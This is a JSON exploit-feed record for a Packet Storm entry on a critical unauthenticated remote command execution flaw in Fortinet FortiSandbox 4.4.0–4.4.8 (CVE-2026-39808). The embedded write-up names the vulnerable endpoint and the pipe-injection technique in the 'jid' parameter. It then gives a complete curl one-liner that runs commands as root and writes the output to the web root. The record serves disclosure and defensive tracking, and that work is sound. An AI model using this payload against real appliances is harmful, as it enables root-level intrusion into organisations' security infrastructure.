📄 Fortinet FortiSandbox 4.4.8 Remote Command Execution_PACKETSTORM:219020

{
    "lastseen": "2026-04-16T15:30:02",
    "description": "Fortinet FortiSandbox versions 4.4.0 through 4.4.8 suffer from a remote command execution vulnerability...",
    "published": "2026-04-16T00:00:00",
    "modified": "2026-04-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Fortinet FortiSandbox 4.4.8 Remote Command Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219020",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-39808"
    ],
    "sourceData": "# CVE-2026-39808\n    \n    On November 2025, a critical vulnerability was discovered on Fortinet's FortiSandbox which allowed an unauthenticated attacker to execute commands in the underlying OS as root. The vulnerability was patched and finally made public on April 2026.\n    \n    This vulnerability affects FortiSandbox versions 4.4.0 through 4.4.8. \n    \n    Read the full advisory [here](https://www.fortiguard.com/psirt/FG-IR-26-100).\n    \n    ## The vulnerability\n    The vulnerability affects the `/fortisandbox/job-detail/tracer-behavior` endpoint. OS commands can be injected using the pipe symbol (`|`) on the `jid` GET parameter.\n    \n    <img width=\"1919\" height=\"747\" alt=\"image008\" src=\"https://github.com/user-attachments/assets/fe1a076e-e68e-4b10-a402-c888ed429d87\" />\n    \n    In the example above, output was redirected to a file in the web root, so that it can be retrieved afterwards.\n    \n    <img width=\"729\" height=\"172\" alt=\"image\" src=\"https://github.com/user-attachments/assets/01af5c52-8022-4c03-84bd-d879e9fcccb2\" />\n    \n    ## PoC\n    \n    A simple curl command is enough to achieve RCE as root with no previous authentication:\n    \n    ```sh\n    curl -s -k --get \"http://$HOST/fortisandbox/job-detail/tracer-behavior\" --data-urlencode \"jid=|(id > /web/ng/out.txt)|\"\n    ```",
    "sourceHref": "https://packetstorm.news/download/219020",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219020/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}